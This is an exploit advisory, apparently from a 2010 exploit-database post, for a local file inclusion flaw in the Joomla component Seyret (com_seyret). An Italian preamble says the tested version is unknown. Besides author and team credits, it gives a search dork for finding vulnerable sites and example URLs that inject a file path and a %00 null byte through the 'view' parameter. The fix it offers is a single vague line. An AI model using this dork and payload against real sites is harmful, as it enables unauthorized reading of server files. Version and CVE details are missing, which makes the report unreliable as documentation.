Non si hanno al momento informazioni su quale versione sia stato effettuato questo test.
Si consiglia a tutti di controllare il sito dello sviluppatore per ulteriori aggiornamenti.
# Exploit Title: Joomla Component Seyret (com_seyret)
# Date: 2010-06-26
# Author: _mlk_
# Software Link: null
# Version: null
# Tested on: Linux*,*BSD and *windows
# CVE : null
# Code : on paper
Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability
########################################################
[+] Discovered by : _mlk_ (Renan)
[+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs
[+] Homepages : http://code.google.com/p/bugsec/ <> http://botecounix.com.br/blog/ <> http://c0d3rs.wordpress.com/
[+] Location : Porto Alegre - RS, Brasil
(or Brazil)
############################################################
[-] Information
[?] Script : Seyret
[?] Vendor : http://joomlaholic.com/
[?] Dork/String : "index.php?option=com_seyret" / "com_seyret"
[?] Download : http://joomlaholic.com/downloads/
[?] Date : 02, July 2010
#############################################################
[*] Example :
http://localhost/index.php?option=com_seyret&view=[LFI]%00
http://localhost/[PATH]/index.php?option=com_seyret&view=[LFI]%00
##################################################################
[*] Solution :
Make a function that scans and reads the inclusion of paths and chars(%00) .
##################################################################